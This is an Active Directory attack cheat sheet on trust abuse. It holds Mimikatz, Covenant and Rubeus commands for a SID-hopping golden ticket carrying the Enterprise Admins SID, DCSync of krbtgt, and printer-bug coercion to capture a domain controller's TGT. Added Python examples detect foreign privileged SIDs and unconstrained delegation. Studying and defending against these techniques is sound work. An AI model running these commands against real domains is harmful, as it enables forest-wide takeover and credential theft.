Trust
danger
Use only the FQDN, never the IP address, after loading the ticket: Kerberos matches the service ticket against the host's SPN, and an IP address will not resolve to one.
Be aware of the double hop issue (see the Covenant section below).
SID-Hopping golden ticket
info
SID hopping only works between two domains within the same forest because, according to Microsoft, all domain trusts in an Active Directory forest are two-way, transitive trusts.
Mimikatz
Retrieve infos
Parent domain SID (take the krbtgt SID returned below and replace its final RID, 502, with 519, the Enterprise Admins RID): (New-Object System.Security.Principal.NTAccount("<domain>","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value
krbtgt: dcsync <fqdn_child_domain> <child_domain>\krbtgt
Get-DomainSID -Domain <fqdn_child_domain>
Get-NetComputer <DC_name>.<fqdn_child_domain>
Forge and load ticket into memory
kerberos::golden /user:<ANY_CHILD_USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<CHILD_DOMAIN_KRBTGT> /sids:<FULL_SID_PARENT_DOMAIN>-519 /ptt
DCSync
lsadump::dcsync /domain:target.evilcorp.com /user:target\krbtgt
Covenant - Defeating the double hop issue
Make a token for a user in the compromised domain (empty password, logon type 9 = NewCredentials)
MakeToken <user> <domain> '' 9
Forge the ticket
kerberos::golden /user:<ANY_CHILD_USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<CHILD_DOMAIN_KRBTGT> /sids:<FULL_SID_PARENT_DOMAIN>-519 /export
echo "<B64>" | base64 -d > ticket.kirbi
Upload the ticket and inject it into memory
upload ticket.kirbi
Rubeus renew /ticket:ticket.kirbi /ptt
DCSync
lsadump::dcsync /domain:target.evilcorp.com /user:target\krbtgt
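Both the Mimikatz and the Covenant variants above carry the parent domain's Enterprise Admins SID in the ticket's ExtraSids. The following Python is an added example, not code from the original page or from any of the tools it mentions: it reproduces the "replace the krbtgt RID with 519" step as a function and shows the detection logic a defender can run over the SIDs found in a ticket's PAC or in a 4624/4627 logon record, flagging privileged SIDs that belong to a domain other than the issuing one. All SIDs are constructed sample values.

```python
# Added example (not from the original page): SID parsing plus a check for
# cross-domain privileged SIDs in ExtraSids, the field a SID-hopping golden
# ticket abuses. Every SID below is a constructed sample value.

import re

# Domain-relative SIDs look like S-1-5-21-<a>-<b>-<c>-<RID>.
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")

# Well-known RIDs that grant domain- or forest-wide control when present in a PAC.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}
KRBTGT_RID = 502
ENTERPRISE_ADMINS_RID = 519


def split_sid(sid: str) -> tuple[str, int]:
    """Split a domain-relative SID into (domain SID, RID)."""
    if not SID_RE.match(sid):
        raise ValueError(f"not a domain-relative SID: {sid!r}")
    domain, rid = sid.rsplit("-", 1)
    return domain, int(rid)


def enterprise_admins_sid(parent_krbtgt_sid: str) -> str:
    """Derive the parent domain's Enterprise Admins SID from its krbtgt SID.

    This is the "replace 502 by 519" step from the page: the domain part is
    kept, only the RID changes.
    """
    domain, rid = split_sid(parent_krbtgt_sid)
    if rid != KRBTGT_RID:
        raise ValueError("expected the krbtgt account SID (RID 502)")
    return f"{domain}-{ENTERPRISE_ADMINS_RID}"


def suspicious_extra_sids(ticket_domain_sid: str, extra_sids: list[str]) -> list[tuple[str, str]]:
    """Return (sid, reason) pairs for ExtraSids a ticket from ticket_domain_sid
    should never carry: privileged well-known RIDs belonging to another domain.

    Inter-forest trusts with SID filtering enabled drop such SIDs at the trust
    boundary; intra-forest trusts do not, which is why this check matters there.
    """
    findings = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain != ticket_domain_sid and rid in PRIVILEGED_RIDS:
            findings.append((sid, f"foreign {PRIVILEGED_RIDS[rid]} SID in ExtraSids"))
    return findings


if __name__ == "__main__":
    parent_krbtgt = "S-1-5-21-1000000001-1000000002-1000000003-502"  # constructed
    child_domain = "S-1-5-21-2000000001-2000000002-2000000003"        # constructed
    forged_extra = [enterprise_admins_sid(parent_krbtgt)]
    for sid, why in suspicious_extra_sids(child_domain, forged_extra):
        print(f"ALERT {sid}: {why}")
```

The check keys on the domain part of each SID rather than on the RID alone, because a child domain legitimately has its own RID-512 group; only a privileged RID under a different domain prefix is the signature of SID hopping. This is also the reason the forest, not the domain, is the security boundary: a trust inside the forest does not filter these SIDs.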
Printer bug
tip
In this example the targeted DC is named dc02.
Retrieve infos
Get-DomainComputer -Domain <target.evilcorp.com>
.\Rubeus.exe monitor /interval:5 /filteruser:dc02$
.\SpoolSample_v4.5_x64.exe <dc02.target.evilcorp.com> <dc01.compromised.evilcorp.com>
cat tmp.b64 | tr -d ' ' | tr -d '\n' > ticket.b64
Rubeus.exe ptt /ticket:<b64>
lsadump::dcsync /domain:<target.evilcorp.com> /user:<target>\krbtgt
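The capture above only works because the host the coerced DC authenticates to (dc01 here) is trusted for unconstrained delegation, so the DC's forwardable TGT lands in its memory. The following Python is an added example, not code from the original page or from Rubeus or SpoolSample: it decodes the userAccountControl bits that define a computer's delegation profile and lists the hosts that would receive such a TGT, which is the inventory a defender checks before worrying about Print Spooler coercion. The computer records are constructed samples shaped like LDAP attributes; only the dc01/dc02 names come from the page.

```python
# Added example (not from the original page): find hosts that can receive a
# coerced account's TGT (unconstrained delegation) from userAccountControl.
# Records are constructed samples; the attribute names match AD's LDAP schema.

UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000                # set on domain controllers
UF_TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                     # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition


def delegation_profile(record):
    """Classify a computer object's delegation configuration."""
    uac = record["userAccountControl"]
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained-with-protocol-transition"
    if record.get("msDS-AllowedToDelegateTo"):
        return "constrained"
    return "none"


def protected_from_delegation(record):
    """True if this account's TGT is never forwardable, so coercing it yields nothing usable."""
    return bool(record["userAccountControl"] & UF_NOT_DELEGATED)


def unconstrained_delegation_findings(records):
    """One finding per host that would hold a coerced DC's TGT.

    Domain controllers carry the flag by default, so they are reported at a
    lower severity; any other host with it is a hardening target.
    """
    findings = []
    for r in records:
        if delegation_profile(r) != "unconstrained":
            continue
        is_dc = bool(r["userAccountControl"] & UF_SERVER_TRUST_ACCOUNT)
        findings.append({
            "host": r["dNSHostName"],
            "severity": "medium" if is_dc else "high",
            "reason": (
                "domain controller: unconstrained delegation is the default, so any DC "
                "coerced to authenticate here hands over its TGT"
                if is_dc else
                "non-DC host with unconstrained delegation: switch to constrained or remove"
            ),
        })
    # High-severity findings first, then alphabetical by host.
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["host"]))


# Constructed sample inventory (dc01/dc02 names taken from the page, the rest invented).
SAMPLE_COMPUTERS = [
    {"dNSHostName": "dc01.compromised.evilcorp.com", "userAccountControl": 0x82000},
    {"dNSHostName": "dc02.target.evilcorp.com", "userAccountControl": 0x82000},
    {"dNSHostName": "app01.target.evilcorp.com", "userAccountControl": 0x81000},
    {"dNSHostName": "ws01.target.evilcorp.com", "userAccountControl": 0x1000},
    {"dNSHostName": "web01.target.evilcorp.com", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["cifs/fs01.target.evilcorp.com"]},
]

if __name__ == "__main__":
    for f in unconstrained_delegation_findings(SAMPLE_COMPUTERS):
        print(f"[{f['severity']}] {f['host']}: {f['reason']}")
```

The same bitmask check applies to user accounts: a service or admin account whose userAccountControl has UF_NOT_DELEGATED set (or that sits in Protected Users) does not get a forwardable TGT, so the coercion step has nothing to capture from it. For the DC-to-DC case on the page, the practical controls are the Print Spooler service state on domain controllers and whether TGT delegation is permitted across the trust, neither of which is visible in these attributes.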